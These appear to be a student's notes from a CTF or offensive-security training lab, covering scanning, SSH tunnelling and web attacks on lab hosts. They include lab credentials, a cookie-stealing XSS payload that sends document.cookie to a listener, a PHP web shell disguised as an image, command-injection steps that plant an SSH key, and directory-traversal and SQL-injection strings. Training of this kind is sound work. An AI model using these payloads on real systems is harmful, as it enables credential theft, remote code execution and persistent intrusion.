------------------------------------------------SECURITY---------------------------------------------------------
Research
https://www.exploit-db.com/exploits/49637 ----------> HIGHLY RECOMMENED
https://nvd.nist.gov/vuln/detail/cve-2021-26855
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-26855
https://www.w3schools.com/SQL/sql_syntax.asp
-----------------------------------------------------------------------------------------
http://127.0.0.1:1111/classinfo.html --------> CTFd

Stack Number	Username	Password	    jump
5 	         GIEC-M-503 A0C9TRXBAzzk 	10.50.15.242      creds: agent :: stealth_mode_on

http://10.50.143.84:8000 ----------> CTF Challenges

  ---RAPIDLY SCAN HOSTS IN A NETWORK---
for i in {1..255}; do (ping -c 1 10.50.12.$i | grep "bytes from" &); done

-----------------------------------------PORT DISCOVERY---------------------------------------------
 nmap -p 53 --script dns* 10.50.12.22-24

nmap -p 80 --script http-enum 10.50.12.22-24

for i in {96..128}; do proxychains nc -nvzw1 129.168.NetID.$i 22 53 80 135 137 139 445 2>&1 | grep OK | grep -Eo "192.168.NetID.:[0-9]" ;done

----ESTABLISH MULTIPLE SSH TUNNELS----
ssh -S /tmp/jump jump -O forward -L1111:10.50.12.21:22 -L112:10.50.12.21:80 

----SHUTDOWN MULTIPLE SSH TUNNELS----
ssh -S /tmp/jump jump -O exit -L1111:10.50.12.21:22 -L112:10.50.12.21:80 

----PROXYCHAINS TUNNEL FOR TOOLS----
ssh -S /tmp/jump jump -O forward -D 9050

------ESTABLIHS MASTER SOCKET------
ssh -MS /tmp/jump agent@10.50.15.242        ssh -S /tmp/jump jump

-----------------------------------------------------------------------------------------------------------------
                    # Create Master Socket
                    ssh -MS /tmp/demo demo1@10.50.12.21 -nF 2>/dev/null
                    ssh -S /tmp/demo demo1@10.50.12.21 
                    
                    # Host Enum, Ping Sweep (from remote box)
                    for i in {1..255}; do (ping -c 1 10.208.50.$i | gep "bytes from" &); done
                    
                    10.208.50.42
                    ---------------------------------------
                    for i in {1..255}; do echo $i; done
------------------------------------------------------------------------------------------------------------

# Port Enum with dynamic and proxychains 
ssh -S /tmp/demo demo -O forward -D 9050
    ss -ntpl | grep 9050  #Sanity check, verify port opened
proxychains nmap 10.208.50.42

# Tunnel to...
10.208.50.42

22/tcp open  ssh
ssh -S /tmp/demo demo -O forward -L42071:10.208.50.42:22
ssh -MS /tmp/t1 -i $HOME/.ssh/id_rsa www-data@127.0.0.1 -p 42071 -fN 2>/dev/null

80/tcp open  http
ssh -S /tmp/demo demo -O forward -L42070:10.208.50.42:80  #Executed from lin-ops

# HTTP Enum, We would add notes to pages we find 
# Check /robots.txt
proxychains nmap --script=http-enum 10.208.50.42 80
|    /robots.txt
|    /java/
|    /path/
|    /uploads/
|    /webexample/
|    /cross/
|    /cmdinjection/
|    /texts/

# Directory Traversal takes advantage of READING files and using absolute path 
../../../../../../etc/passwd
../../../../../../etc/hosts    #Goes into URL

# CMD Injection uses semi-colon to run commands (not an active shell, can cd) 
; whoami

# Javascript
Open Inspector
Find JS by looking for functions (
Open console in Inspector and run js manually, e.g. changetext()

# Steal cookies
Setup nc listener
nc -lk 10.50.187.52 42071  # Where you want to intercept cookie

Post to chat...
<script>document.location="http://10.50.187.52:42070/?username=" + document.cookie;</script>

# Malicious upload requires 1. Upload, 2. Find uploads, 3. Call uploads

touch 503.png.php
<HTML><BODY>
  <FORM METHOD="GET" NAME="myform" ACTION="">
  <INPUT TYPE="text" NAME="cmd">
  <INPUT TYPE="submit" VALUE="Send">
  </FORM>
  <pre>
  <?php
  if($_GET['cmd']) {
    system($_GET['cmd']);
    }
  ?>
  </pre>
  </BODY></HTML>
#Travel to /uploads URL

### SSH KEYGEN ###
Identify user and home directory using whoami and cat /etc/passwd

# Generate our key
### From lin-ops
ssh-keygen -t rsa -b 4096 # Enter for default option
No Passphrase
cat /home/student/.ssh/id_rsa.pub

## On Target, make directory and verify
; mkdir /var/www/.ssh
; ls -la /var/www

## One Target, upload key and verify
; echo "" > /var/www/.ssh/authorized_keys # Paste whole key into echo
; cat /var/www/.ssh/authorized_keys
----------------------------------------------------------------------------------------------------------------------
User enters tom' OR 1='1 in the name and pass fields.
Truth Statement: tom ' OR 1='1
Server-Side query executed would appear like this:
SELECT id FROM users WHERE name=‘tom' OR 1='1’ AND pass=‘tom' OR 1='1’



















































































